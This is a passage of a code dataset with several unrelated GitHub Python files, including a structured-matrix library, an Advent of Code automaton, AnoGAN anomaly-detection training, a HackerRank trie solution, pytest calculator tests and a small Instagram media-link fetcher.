self.data = matrix\n self.shape = cast(Tuple[int,int], matrix.shape)\n self.ndim = 2\n\n def hash(self)->int:\n return matrix_hash(self.asmatrix())\n\n def asmatrix(self)->np.ndarray:\n return self.data\n\n def inv(self)->'DenseMatrix':\n return DenseMatrix(np.linalg.inv(self.asmatrix()))\n\n def __neg__(self)->'DenseMatrix':\n return -1.0 * self\n\n @property\n def T(self):\n return DenseMatrix(self.data.T)\n\n def conjugate(self):\n return DenseMatrix(self.data.conjugate())\n\n conj = conjugate\n\n def __mul__(self, other)->'DenseMatrix':\n if np.isscalar(other):\n return DenseMatrix(self.data * other)\n else:\n return NotImplemented\n\n __rmul__ = __mul__\n\n def __matmul__(self, other)->Union['DenseMatrix', np.ndarray]:\n assert self.shape[1] == other.shape[0]\n assert isinstance(other, MatrixBase) or (isinstance(other, np.ndarray) and other.ndim<=2)\n if isinstance(other, np.ndarray):\n return self.asmatrix() @ other\n else:\n if isinstance(other, ScaledIdentityMatrix):\n return self @ other.to_diagonal_matrix()\n elif isinstance(other, DiagonalMatrix):\n res = np.zeros((self.shape[0], other.shape[1]), dtype=np.complex128) # make real if possible\n min_size = min(*other.shape)\n res[:, 0:min_size] = \\\n self.data[:, 0:min_size] * other.diagonals[None,:]\n return DenseMatrix(res)\n else:\n return DenseMatrix(self.data @ other.asmatrix())\n\n def __add__(self, other)->'DenseMatrix':\n assert isinstance(other, MatrixBase)\n assert self.shape == other.shape\n\n return DenseMatrix(self.asmatrix() + other.asmatrix())\n\n\n\nclass ScaledIdentityMatrix(MatrixBase):\n \"\"\"\n Scaled Identity matrix 
with a rectangular shape\n \"\"\"\n def __init__(\n self,\n shape: Union[int, Tuple[int,int]],\n coeff: Union[complex, float, np.float64, np.complex128]\n )->None:\n assert type(coeff) in [complex, float, np.float64, np.complex128], type(coeff)\n self.shape = (0,0) # type: Tuple[int, int]\n if isinstance(shape, int):\n self.shape = (shape, shape)\n elif isinstance(shape, tuple):\n self.shape = shape\n else:\n raise ValueError(\"Invalid shape value!\")\n self.coeff = coeff # type: Union[complex, float, np.float64, np.complex128]\n self.ndim = 2 # type: int\n\n def hash(self)->int:\n return matrix_hash(self.coeff)\n\n def asmatrix(self) -> np.ndarray:\n return self.coeff * np.eye(N=self.shape[0], M=self.shape[1])\n\n def __neg__(self)->'ScaledIdentityMatrix':\n return -1.0 * self\n\n def inv(self)->'ScaledIdentityMatrix':\n if not self.is_diagonal():\n raise RuntimeError(\"A rectangular matrix is not invertible!\")\n return ScaledIdentityMatrix(self.shape, 1/self.coeff)\n\n @property\n def T(self) -> 'ScaledIdentityMatrix':\n return ScaledIdentityMatrix((self.shape[1], self.shape[0]), self.coeff)\n\n @property\n def diagonals(self)->np.ndarray:\n if not self.is_diagonal():\n raise RuntimeError(\"Diagonals of a rectangular matrix is ill defined!\")\n return np.full(self.shape[0], self.coeff)\n\n def conjugate(self)->'ScaledIdentityMatrix':\n return ScaledIdentityMatrix(self.shape, np.conjugate(self.coeff))\n\n conj = conjugate\n\n def __mul__(self, other)->'ScaledIdentityMatrix':\n if type(other) in [complex, float, np.float64, np.complex128]:\n return ScaledIdentityMatrix(self.shape, self.coeff*other)\n else:\n return NotImplemented\n\n __rmul__ = __mul__\n\n def __matmul__(self, other: Union[MatrixBase, np.ndarray])->Union[MatrixBase,np.ndarray]:\n assert self.shape[1] == other.shape[0], f\"{self.shape} {other.shape}\"\n assert isinstance(other, MatrixBase) or isinstance(other, np.ndarray)\n return self.to_diagonal_matrix() @ other\n\n def __add__(self, other: MatrixBase)->MatrixBase:\n assert isinstance(other, MatrixBase)\n assert self.shape == other.shape, f\"{self.shape} {other.shape}\"\n\n if isinstance(other, ScaledIdentityMatrix):\n return ScaledIdentityMatrix(self.shape, self.coeff + other.coeff)\n elif isinstance(other, DiagonalMatrix):\n return DiagonalMatrix(self.coeff*np.ones(self.shape[0]) + other.diagonals)\n elif isinstance(other, PartialDiagonalMatrix):\n return PartialDiagonalMatrix(\n ScaledIdentityMatrix(other.matrix.shape[0], self.coeff) + other.matrix,\n other.rest_dims)\n else:\n return DenseMatrix(self.asmatrix() + other.asmatrix())\n\n def to_diagonal_matrix(self):\n \"\"\" Convert to a diagonal matrix \"\"\"\n return DiagonalMatrix(self.coeff*np.ones(min(*self.shape)), self.shape)\n\nclass DiagonalMatrix(MatrixBase):\n \"\"\"\n Diagonal matrix\n \"\"\"\n def __init__(self, diagonals, shape: Optional[Tuple[int,int]] = None)->None:\n assert diagonals.ndim == 1\n self._diagonals = diagonals\n self.ndim = 2\n if shape is None:\n self.shape = (diagonals.size, diagonals.size)\n else:\n self.shape = shape\n assert min(*self.shape) == diagonals.size, f\"{self.shape} {diagonals.size}\"\n\n def hash(self) -> int:\n return matrix_hash(self.diagonals)\n\n @property\n def diagonals(self) -> np.ndarray:\n return self._diagonals\n\n def __neg__(self)->'DiagonalMatrix':\n return -1.0 * self\n\n def inv(self) -> 'DiagonalMatrix':\n if not self.is_diagonal():\n raise RuntimeError(\"Must be a diagonal matrix!\")\n return DiagonalMatrix(1/self.diagonals)\n\n def asmatrix(self) -> 
np.ndarray:\n mat = np.zeros(self.shape, dtype=self.diagonals.dtype)\n min_size = min(*self.shape)\n for i in range(min_size):\n mat[i,i] = self.diagonals[i]\n return mat\n\n @property\n def T(self) -> 'DiagonalMatrix':\n return DiagonalMatrix(self.diagonals, shape=(self.shape[1], self.shape[0]))\n\n def conjugate(self) -> 'DiagonalMatrix':\n return DiagonalMatrix(self.diagonals.conjugate(), self.shape)\n\n conj = conjugate\n\n def __mul__(self, other) -> 'DiagonalMatrix':\n if type(other) in [complex, float, np.float64, np.complex128]:\n return DiagonalMatrix(self._diagonals * other, self.shape)\n else:\n return NotImplemented\n\n __rmul__ = __mul__\n\n def __add__(self, other) -> MatrixBase:\n assert isinstance(other, MatrixBase)\n assert self.shape == other.shape\n\n if isinstance(other, DenseMatrix):\n return DenseMatrix(other.asmatrix() + np.diag(self.diagonals))\n elif isinstance(other, ScaledIdentityMatrix):\n return DiagonalMatrix(self.diagonals + np.full(self.diagonals.size, other.coeff))\n elif isinstance(other, DiagonalMatrix):\n return DiagonalMatrix(self.diagonals + other.diagonals)\n elif isinstance(other, PartialDiagonalMatrix):\n return DenseMatrix(self.asmatrix() + other.asmatrix())\n else:\n return NotImplemented\n\n\n def __matmul__(self, other: Union[MatrixBase, np.ndarray]) -> Union[MatrixBase, np.ndarray]:\n \"\"\" self @ other \"\"\"\n assert self.shape[1] == other.shape[0]\n assert isinstance(other, MatrixBase) or isinstance(other, np.ndarray)\n\n if isinstance(other, np.ndarray):\n dtype = np.dtype(type(self._diagonals[0] * other.ravel()[0]))\n if other.ndim == 1:\n res = np.zeros(self.shape[0], dtype=dtype)\n min_len = min(self._diagonals.size, other.size)\n res[0:min_len] = self._diagonals[0:min_len] * other[0:min_len]\n return res\n else:\n rest_dim = other.shape[1:]\n res = np.zeros((self.shape[0],) + rest_dim, dtype=dtype)\n min_len = min(self._diagonals.size, other.size)\n res[0:min_len, ...] 
= \\\n np.einsum('d,d...->d...', self._diagonals[0:min_len], other[0:min_len, ...], optimize=True)\n return res\n elif isinstance(other, DenseMatrix):\n return DenseMatrix(self._diagonals[:,None] * other.data)\n elif isinstance(other, DiagonalMatrix):\n min_size = min(self.shape[0], other.shape[1])\n return DiagonalMatrix(\n _vecprod(self._diagonals, other._diagonals, min_size),\n (self.shape[0], other.shape[1])\n )\n elif isinstance(other, PartialDiagonalMatrix):\n return DenseMatrix(self._diagonals[:,None] * other.asmatrix())\n elif isinstance(other, ScaledIdentityMatrix):\n return self @ other.to_diagonal_matrix()\n else:\n return NotImplemented\n\n def __str__(self) -> str:\n return \"DiagonalMatrix: \" + self.diagonals.__str__()\n\n\nclass PartialDiagonalMatrix(MatrixBase):\n \"\"\"\n Matrix that can be composed as\n A otimes I.\n \"\"\"\n def __init__(self, matrix: Union[np.ndarray, MatrixBase], rest_dims: tuple) -> None:\n assert matrix.ndim == 2\n self.matrix = asmatrixtype(matrix)\n self._matrix_cg = matrix.T.conj()\n self.rest_dims = rest_dims\n self.ndim = 2\n self.shape = (matrix.shape[0]*np.prod(rest_dims), matrix.shape[1]*np.prod(rest_dims))\n\n def hash(self) -> int:\n return matrix_hash(self.matrix)\n\n def asmatrix(self) -> np.ndarray:\n return np.einsum(\n 'IJ,ij->IiJj',\n self.matrix.asmatrix(),\n np.identity(np.prod(self.rest_dims)),\n optimize=True\n ).reshape(self.shape)\n\n def __neg__(self)->'PartialDiagonalMatrix':\n return -1.0 * self\n\n def inv(self) -> 'PartialDiagonalMatrix':\n return PartialDiagonalMatrix(self.matrix.inv(), self.rest_dims)\n\n @property\n def T(self) -> 'PartialDiagonalMatrix':\n return PartialDiagonalMatrix(self.matrix.T, self.rest_dims)\n\n def conjugate(self) -> 'PartialDiagonalMatrix':\n return PartialDiagonalMatrix(self.matrix.conjugate(), self.rest_dims)\n\n conj = conjugate\n\n def __matmul__(self, other) -> Union[np.ndarray, MatrixBase]:\n \"\"\" self @ other \"\"\"\n assert self.shape[1] == other.shape[0]\n assert isinstance(other, MatrixBase) or isinstance(other, np.ndarray)\n if isinstance(other, np.ndarray):\n return self.matvec(other)\n elif isinstance(other, PartialDiagonalMatrix) and self.rest_dims == other.rest_dims:\n return PartialDiagonalMatrix(self.matrix@other.matrix, self.rest_dims)\n else:\n return DenseMatrix(self.asmatrix() @ other.asmatrix())\n\n\n def __mul__(self, other) -> 'PartialDiagonalMatrix':\n if type(other) in [float, complex, np.float64, np.complex128]:\n return PartialDiagonalMatrix(self.matrix * other, self.rest_dims)\n else:\n return NotImplemented\n\n __rmul__ = __mul__\n\n def __add__(self, other) -> MatrixBase:\n assert isinstance(other, MatrixBase)\n assert self.shape == other.shape\n\n if isinstance(other, ScaledIdentityMatrix):\n return PartialDiagonalMatrix(\n self.matrix + ScaledIdentityMatrix(self.matrix.shape, other.coeff),\n self.rest_dims\n )\n else:\n return DenseMatrix(self.asmatrix() + other.asmatrix())\n\n\n def matvec(self, v: np.ndarray) -> np.ndarray:\n r\"\"\"\n (a \\otimes I) @ v\n v can be a vector or a tensor.\n In the latter case, the matrix applied to the first axis of v.\n \"\"\"\n return _matvec_impl(self.matrix, v, self.rest_dims)\n\n\ndef _matvec_impl(\n matrix: Union[MatrixBase, np.ndarray],\n v: np.ndarray,\n rest_dims: tuple\n ) -> np.ndarray:\n\n res_leading_dim = matrix.shape[0] * np.prod(rest_dims)\n res_shape = (0,) # type: Tuple[int,...]\n if v.ndim == 1:\n res_shape = (res_leading_dim,)\n else:\n res_shape = (res_leading_dim,) + v.shape[1:]\n\n v = 
v.reshape(matrix.shape[1], *rest_dims, -1)\n if isinstance(matrix, DiagonalMatrix):\n return cast(np.ndarray, matrix @ v).reshape(res_shape)\n elif isinstance(matrix, DenseMatrix):\n return np.tensordot(\n matrix.asmatrix(),\n v,\n axes=(-1,0)\n ).reshape(res_shape)\n elif isinstance(matrix, ScaledIdentityMatrix):\n return (matrix.coeff * v.ravel()).reshape(res_shape)\n else:\n raise RuntimeError(f\"Unsupported type{type(matrix)}!\")\n\ndef identity(n, dtype=np.float64) -> ScaledIdentityMatrix:\n \"\"\" Create an identity matrix \"\"\"\n n = int(n)\n assert isinstance(n, int), n\n return ScaledIdentityMatrix(n, dtype(1.0))\n\n\ndef matrix_hash(a) -> int:\n \"\"\" Compute hash of a matrix a\"\"\"\n if isinstance(a, np.ndarray):\n return hash(a.data.tobytes()) # This makes a copy\n elif np.isscalar(a):\n return hash(a)\n else:\n return a.hash()\n\ndef asmatrixtype(a) -> MatrixBase:\n assert isinstance(a, MatrixBase) or (isinstance(a, np.ndarray) and a.ndim==2)\n if isinstance(a, np.ndarray):\n return DenseMatrix(a)\n return a\n\n\ndef _vecprod(v1: np.ndarray, v2: np.ndarray, size=Optional[int]):\n \"\"\"\n Elementwise product of two vectors.\n If v1.size < size and v2.size, the result is padded on the right\n so that the returned array is size.\n \"\"\"\n assert isinstance(v1, np.ndarray)\n assert isinstance(v2, np.ndarray)\n min_size = min(v1.size, v2.size)\n res = v1[0:min_size] * v2[0:min_size]\n return _pad_by_zero(res, size)\n\ndef _pad_by_zero(arr: np.ndarray, size: int):\n assert arr.size <= size\n if arr.size == size:\n return arr\n res = np.zeros(size, dtype=arr.dtype)\n res[0:arr.size] = arr\n return res","repo_name":"SpM-lab/admmsolver","sub_path":"src/admmsolver/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":15453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70732507047","text":"import string\nimport sys\nimport time\nimport copy \n\nwith open(\"day24_i.txt\", \"r\") as f:\n map_ = [[c for c in l if c != '\\n'] for l in f.readlines()]\n\nclass Area:\n def __init__(self, map_):\n self.map = map_\n self.width = len(map_[0])\n self.height = len(map_)\n\n def show(self, pos=None):\n sys.stderr.write(\"AREA MAP\\n\\n\")\n for x, line in enumerate(self.map):\n sys.stderr.write(\"{:2d}\".format(x))\n for y, obj in enumerate(line):\n if pos is not None and pos[0] == x and pos[1] == y:\n sys.stderr.write(\"=\")\n else:\n sys.stderr.write(obj)\n sys.stderr.write(\"\\n\")\n sys.stderr.write(\"\\n\")\n\n def foreach(self, find_func):\n for y, line in enumerate(self.map):\n for x, obj in enumerate(line):\n find_func(x, y, obj)\n\n def get(self, pos):\n return self.map[pos[1]][pos[0]]\n\n def is_portal(self, pos):\n return self.get(pos) in string.ascii_lowercase\n\n def is_wall(self, pos):\n return self.get(pos) in string.ascii_uppercase\n\n def rank(self):\n r = [0]\n def _rank(x, y, obj):\n if obj == \"#\":\n r[0] += 2 ** (x + y * self.width)\n\n self.foreach(_rank)\n return r[0]\n\n def vicinity(self, pos):\n candidates = [\n (pos[0] + 1, pos[1]),\n (pos[0] - 1, pos[1]),\n (pos[0], pos[1] + 1),\n (pos[0], pos[1] - 1)\n ]\n return [p for p in candidates\n if p[0] >= 0\n and p[0] < self.width\n and p[1] >= 0\n and p[1] < self.height]\n\narea = Area(map_)\narea.show()\n\nt = 0\nranks = set() \nwhile True:\n print(t)\n #area.show()\n new_map = copy.deepcopy(area.map)\n\n if t % 1000 == 0:\n print(t)\n\n def life(x,y,obj):\n if obj == \"#\":\n neighs = area.vicinity((x,y))\n neighs_life = sum([1 for n in 
neighs if area.get(n) == \"#\"])\n\n                if neighs_life == 1:\n                    new_map[y][x] = \"#\"\n                else:\n                    new_map[y][x] = \".\"\n            elif obj == \".\":\n                neighs = area.vicinity((x,y))\n                neighs_life = sum([1 for n in neighs if area.get(n) == \"#\"])\n\n                if neighs_life == 1 or neighs_life == 2:\n                    new_map[y][x] = \"#\"\n                else:\n                    new_map[y][x] = \".\"\n            else:\n                assert False, \"Unknown object\"\n\n    area.foreach(life)\n\n    area.map = new_map\n\n    area.show()\n    rating = area.rank()\n    if rating in ranks:\n        print(\"repeats !\")\n        print(t)\n        print(rating)\n        break\n    else:\n        ranks |= {rating}\n    #print(ranks)\n    #time.sleep(0.5)\n    t += 1\n","repo_name":"ey3ball/adventofcode2019","sub_path":"day24/day24_1.py","file_name":"day24_1.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71742744487","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nwith open('requirements.txt') as fp:\n    install_requires = fp.read().split('\\n')\n\nsetup(\n    name='human_pose_util',\n    version='0.0.1',\n    description='Human Pose Utility Functions',\n    url='http://github.com/jackd/human_pose_util',\n    author='Dominic Jack',\n    author_email='thedomjack@gmail.com',\n    license='MIT',\n    packages=find_packages(),\n    install_requires=install_requires,\n    zip_safe=True,\n)\n","repo_name":"jackd/human_pose_util","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"7437894361","text":"from bs4 import BeautifulSoup\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium import webdriver\r\nimport webbrowser\r\n\r\n\r\n\r\ndef get_url(url , option):\r\n    chrome_options = Options()\r\n    chrome_options.headless = True\r\n    user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'\r\n    chrome_options.add_argument(f'user-agent={user_agent}')\r\n\r\n    browser = webdriver.Chrome(options=chrome_options)\r\n    browser.get(url)\r\n    soup = BeautifulSoup(browser.page_source , features='html5lib')\r\n\r\n    if (option == 0):\r\n        get_meta = soup.find('meta' , property='og:image')\r\n        image_link = get_meta['content']\r\n        return image_link\r\n    elif (option == 1):\r\n        get_meta = soup.find('meta' , property='og:video')\r\n        video_link = get_meta['content']\r\n        return video_link\r\n    else:\r\n        return None\r\n\r\n\r\nurl = input('Enter Your Url :')\r\nwhile True:\r\n    option = int(input('Image [0]\\nVideo [1] : '))\r\n    if (option == 1 or option == 0):\r\n        break\r\n    else:\r\n        continue\r\n    \r\n\r\nobject_url = get_url(url , option)\r\nwebbrowser.open(object_url , new=0 , autoraise=True)\r\n","repo_name":"DolenDeori/Photo_video_downloader_insta_fb","sub_path":"instapic_downloader.py","file_name":"instapic_downloader.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23356752149","text":"##import os\n##import subprocess\n##cmd = \"date\"\n##\n####returned_value = os.system(cmd)\n####print('returned value:', returned_value)\n##\n####returned_output = subprocess.check_output(cmd)\n####print('Current date is:', returned_output.decode(\"utf-8\"))\n\nfrom tkinter import Tk\nimport time\n\n\n\nM=[\"c\",\"b\",\"a\"]\n\nr = 
Tk()\nr.withdraw()\nr.clipboard_clear()\nr.clipboard_append(\"i\")\n\nr.update()\ntime.sleep(.2)\nr.update()\n\nr.destroy()\n\n\n\n","repo_name":"xanderrp2/RandomPractice","sub_path":"text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5982876056","text":"# + ---------------- +\n# | IMPORT LIBRARIES |\n# + ---------------- +\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.nn.init as init\nfrom torch.autograd import Variable\nimport torchvision.utils as v_utils\nimport torchvision.transforms as transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom model_drk import Generator\nfrom model_drk import Discriminator\nimport torchvision\nfrom utils import EarlyStopping, data_loader, weights_init\nimport argparse\nimport random\n\n\n\n# + ------- +\n# | SET GPU |\n# + ------- +\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"1\"\ndevice = torch.device(f'cuda:0' if torch.cuda.is_available() else 'cpu')\nprint(device)\n\n\n\n# + ------------- +\n# | SET ARGUMENTS |\n# + ------------- +\nparser = argparse.ArgumentParser(description='Arguments for AnoGAN model training')\nparser.add_argument('--random_seed', type = int, default = 42, help = 'Random seed')\nparser.add_argument('--epochs', type = int, default = 30, help = 'The number of epochs')\nparser.add_argument('--train_val_ratio', type = float, default = 0.2, help = 'Ratio between train and val dataset')\nparser.add_argument('--batch_size', type = int, default = 32, help = 'The size of batch')\nparser.add_argument('--time_step', type = int, default = 30, help = 'Timestep for temporalization of time-series data')\nparser.add_argument('--lr', type = float, default = 0.0002, help = 'Learning rate')\nparser.add_argument('--num_gpus', type = int, default = 1, help = 'The number of available GPUs')\nparser.add_argument('--num_workers', type = int, default = 0, help = 'The number of available workers')\nparser.add_argument('--nz', type = int, default = 100, help = 'Dimension of noise vector')\nparser.add_argument('--ngf', type = int, default = 64, help = 'Number of conv filters for generator')\nparser.add_argument('--ndf', type = int, default = 8, help = 'Number of conv filters for discriminator')\nparser.add_argument('--nc', type = int, default = 1, help = 'Number of channels for input image') ## color: 3 / gray: 1\nparser.add_argument('--beta1', type = float, default = 0.5, help = 'Parameters of Adam optimizer')\n\n### ----- Store the above contents in args\n# args = parser.parse_args() ### Code when running in Pycharm\nargs = parser.parse_args(args=[]) ### Code when running in Jupyter notebook\n\n### ----- Print the received argument values\nprint(\"##### Arguments #####\\n\")\nprint(\"random_seed: \", args.random_seed)\nprint(\"Epochs: \", args.epochs)\nprint(\"train_val_ratio: \", args.train_val_ratio)\nprint(\"batch_size: \", args.batch_size)\nprint(\"Learning rate: \", args.lr)\nprint(\"num_gpus: \", args.num_gpus)\nprint(\"num_workers: \", args.num_workers)\nprint(\"nz: \", args.nz)\nprint(\"ngf: \", args.ngf)\nprint(\"ndf: \", args.ndf)\nprint(\"nc: \", args.nc)\nprint(\"beta1: \", args.beta1)\n\n\n\n# + ------------------ +\n# | SET HYPERPARAMETER |\n# + ------------------ +\nparams = {\n    \"epoch\": args.epochs,\n    \"batch_size\": args.batch_size,\n    \"learning_rate\": args.lr,\n    \"num_gpus\": args.num_gpus,\n    \"num_workers\": args.num_workers,\n    \"nz\": args.nz,\n    \"ngf\": args.ngf, \n    \"ndf\": args.ndf, \n    \"nc\": args.nc, \n    \"beta1\": 
args.beta1\n}\n\n### ----- Secure reproducibility\nnp.random.seed(args.random_seed)\ntorch.manual_seed(args.random_seed)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nrandom.seed(args.random_seed)\n\n\n\n# + ---------------- +\n# | TARGET LADLE CAR |\n# + ---------------- +\ncars = ['car1', 'car2']\n\n\nfor idx, target_car in enumerate(cars):\n    # + ----------------------------- +\n    # | LOAD DATASET & SET DATALOADER |\n    # + ----------------------------- +\n    train_loader, test_loader = data_loader(target_car, params['batch_size'], params['num_workers'])\n\n\n\n    # + ------------ +\n    # | DEFINE MODEL |\n    # + ------------ +\n    ### ----- Put class objects on Multiple GPUs using\n    ### ----- torch.nn.DataParallel(module, device_ids=None, output_device=None, dim=0)\n    ### ----- device_ids: default all devices / output_device: default device 0\n    ### ----- along with .cuda()\n    generator = nn.DataParallel(Generator(params[\"nz\"], params[\"ngf\"], params[\"nc\"])).cuda()\n    discriminator = nn.DataParallel(Discriminator(params[\"ndf\"], params[\"nc\"])).cuda()\n    generator.apply(weights_init)\n    discriminator.apply(weights_init)\n    # generator = Generator()\n    # discriminator = Discriminator()\n\n\n\n    # + ---------------------------------------------------- +\n    # | DEFINE LOSS FUNCTION, OPTIMIZER, LABELS FOR TRAINING |\n    # + ---------------------------------------------------- +\n    loss_func = nn.MSELoss()\n    # loss_func = nn.BCELoss()\n    gen_optim = torch.optim.Adam(\n        generator.parameters(), \n        lr=5*params[\"learning_rate\"],\n        betas=(params[\"beta1\"], 0.999)\n    ) ## Optimizer for generator\n    dis_optim = torch.optim.Adam(\n        discriminator.parameters(), \n        lr=params[\"learning_rate\"],\n        betas=(params[\"beta1\"], 0.999)\n    ) ## Optimizer for discriminator\n    # ones_label = Variable(torch.ones(batch_size, 1)).cuda() ## deprecated\n    # zeros_label = Variable(torch.zeros(batch_size, 1)).cuda() ## deprecated\n    # ones_label = torch.Tensor(torch.ones(batch_size, 1)).cuda()\n    # zeros_label = torch.Tensor(torch.zeros(batch_size, 1)).cuda()\n\n\n\n    # + -------------- +\n    # | MODEL TRAINING |\n    # + -------------- +\n    ### ----- Load checkpoints\n    # try:\n    #     generator.load_state_dict(torch.load('./saved_model/generator.pkl'))\n    #     discriminator.load_state_dict(torch.load('./saved_model/discriminator.pkl'))\n    #     print(\"\\n--------model restored--------\\n\")\n    # except:\n    #     print(\"\\n--------model not restored--------\\n\")\n    #     pass\n    gen_losses = []\n    dis_losses = []\n\n    min_gen_loss = 1000\n    min_dis_loss = 1000\n\n    ### ----- Train\n    for i in range(params[\"epoch\"]):\n        for j, (image, label) in enumerate(train_loader):\n            # image = Variable(image).cuda() ## deprecated\n            image = torch.Tensor(image).cuda()\n            # print(image.size())\n            batch_size = image.size()[0]\n            # print(batch_size)\n\n            # ones_label = Variable(torch.ones(batch_size, 1)).cuda() ## deprecated\n            # zeros_label = Variable(torch.zeros(batch_size, 1)).cuda() ## deprecated\n            ones_label = torch.Tensor(torch.ones(batch_size, 1)).cuda() ## torch.Size([batch_size, 1])\n            zeros_label = torch.Tensor(torch.zeros(batch_size, 1)).cuda() ## torch.Size([batch_size, 1])\n\n            ### ----- Generator\n            gen_optim.zero_grad()\n\n            z = Variable(init.normal(torch.Tensor(batch_size, 100), mean=0, std=0.1)).cuda() ## deprecated\n            # z = torch.Tensor(init.normal_(torch.zeros(batch_size, 100), mean=0, std=0.1)).requires_grad_(requires_grad=True)\n            gen_fake = generator.forward(z) ## Generate fake image\n            dis_fake, _ = discriminator.forward(gen_fake) ## 
Discriminate generated fake image\n\n            gen_loss = torch.sum(loss_func(dis_fake, ones_label)) ## fake classified as real\n            gen_losses.append(gen_loss.detach().cpu().item())\n\n            gen_loss.backward(retain_graph=True)\n            gen_optim.step()\n\n            \n\n            ### ----- Discriminator\n            dis_optim.zero_grad()\n\n            z = Variable(init.normal(torch.Tensor(batch_size, 100), mean=0, std=0.1)).cuda() ## deprecated\n            # z = torch.Tensor(init.normal_(torch.zeros(batch_size, 100), mean=0, std=0.1)).requires_grad_(requires_grad=True)\n            gen_fake = generator.forward(z)\n            dis_fake, _ = discriminator.forward(gen_fake)\n\n            dis_real, _ = discriminator.forward(image) ## image.shape = torch.Size([32, 1, 28, 28])\n            dis_loss = torch.sum(loss_func(dis_fake, zeros_label)) + torch.sum(loss_func(dis_real, ones_label))\n            dis_losses.append(dis_loss.detach().cpu().item())\n\n            dis_loss.backward()\n            dis_optim.step()\n\n            \n\n            ### ----- Model save\n            if j % 50 == 0:\n                print(\"{}th iteration gen_loss: {} dis_loss: {}\".format(i, gen_loss.data, dis_loss.data))\n                \n            if min_dis_loss > dis_loss:\n                min_dis_loss = dis_loss\n                torch.save(generator.state_dict(), './model/' + target_car + '/generator.pkl') ## If the path contains '_', a path problem keeps raising OSError (OSError: [Errno 22] Invalid argument)\n                torch.save(discriminator.state_dict(), './model/' + target_car + '/discriminator.pkl')\n\n                print(\"Model save!\")\n\n            # v_utils.save_image(gen_fake.data[0:25], \"./result/gen_{}_{}.png\".format(i, j), nrow=5)\n\n    # image_check(gen_fake.cpu())\n","repo_name":"jkc4416/Project_AnomalyDetection_AnoGAN","sub_path":"AnoGAN_drk.py","file_name":"AnoGAN_drk.py","file_ext":"py","file_size_in_byte":8751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12159713189","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the maxXor function below.\ndef maxXor(arr, queries):\n    ans = []\n    trie = {} # dictionary in dictionary for binary tree of bits for every number in array\n    # node copies from trie and is for further processing\n    k = len(bin(max(arr+queries))) - 2 # longest binary length, 2 is for 0b prefix\n    for binumber in ['{:b}'.format(x).zfill(k) for x in arr]:\n        node = trie # update node as trie was updated by setdefault\n        #print(f'binumber is {binumber}')\n        for bit in binumber:\n            node = node.setdefault(bit, {}) # because it is a dict, it also changes trie\n        #print(f'{trie}')\n    for n in queries: # 3 7 2\n        node = trie\n        s = ''\n        for bit in '{:b}'.format(n).zfill(k): # 011,111,010\n            #print(f'node {node}')\n            reversebit = str(int(bit) ^ 1) # flipping the bits\n            reversebit = reversebit if reversebit in node else bit\n            s += reversebit\n            node = node[reversebit] # go inside another tree\n        ans.append(int(s, 2) ^ n) # convert from base 2 to integer\n    return ans\n\nif __name__ == '__main__':\n    fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n    n = int(input())\n\n    arr = list(map(int, input().rstrip().split()))\n\n    m = int(input())\n\n    queries = []\n\n    for _ in range(m):\n        queries_item = int(input())\n        queries.append(queries_item)\n\n    result = maxXor(arr, queries)\n\n    fptr.write('\\n'.join(map(str, result)))\n    fptr.write('\\n')\n\n    fptr.close()\n","repo_name":"Bidek56/HackerRank","sub_path":"Python/maxXor.py","file_name":"maxXor.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29141890363","text":"import pytest\r\nimport yaml\r\n\r\nfrom myenv.python_code1.calc import Calculator\r\n\r\nwith 
open(\"./pytest learning1/data.yaml\") as f:\r\n data = yaml.safe_load(f)['add']\r\n add_data = data['data']\r\n print(add_data)\r\n add_id = data['add_id']\r\n print(add_id)\r\n div_data = data['data']\r\n print(div_data)\r\n div_id = data ['div_id']\r\n print (div_id)\r\n\r\nclass TestCalc:\r\n def setup_class(self):\r\n print(\"开始计算\")\r\n self.calc = Calculator()\r\n\r\n def teardown_class(self):\r\n print(\"计算结束\")\r\n\r\n @pytest.mark.parametrize(\"a,b,expect\",add_data,add_id)\r\n def test_add(self, a, b, expect):\r\n result = self.calc.add(a, b)\r\n if isinstance(result, float):\r\n result = round(result, 2)\r\n assert result == expect\r\n\r\n @pytest.mark.parametrize(\"a,b,expect\",div_data,div_id)\r\n def test_div(self, a, b, expect):\r\n result = self.calc.div(a, b)\r\n if isinstance(result,float):\r\n result = round(result,2)\r\n assert result == expect\r\n\r\n","repo_name":"ruyu-yin/STE","sub_path":"test_cal1.py","file_name":"test_cal1.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70500903","text":"from track.cli import tests, CLIRules\nfrom textwrap import dedent, wrap\n\n\ndef main():\n print(dedent('''\n ===============\n Available Tests\n ===============\n\n '''))\n\n for key in tests.AvailableTests:\n if not key:\n continue\n test = CLIRules.get_test(key)\n docstring = test.__doc__.strip()\n 